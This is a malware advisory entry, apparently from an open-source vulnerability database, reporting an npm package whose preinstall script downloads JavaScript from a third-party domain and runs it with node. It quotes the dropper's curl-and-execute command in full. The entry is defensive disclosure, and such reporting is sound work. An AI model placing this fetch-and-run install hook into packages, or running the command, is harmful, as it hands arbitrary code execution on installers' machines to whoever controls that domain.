MAL-2026-6266

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87) package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the package downloads JavaScript from poc.amanrawat.com and immediately executes it with node under the installer's privileges. The fetched content is unpinned, unhashed, served from a third-party non-publisher domain, and mutable — whoever controls poc.amanrawat.com can ship arbitrary code to every installer at any time. The package itself contains no functionality beyond this dropper. The package name (test-package-sajsdkashdj) and the fetch target (a path named hehe.js on a personal-looking domain) further indicate this is not a legitimate distribution mechanism.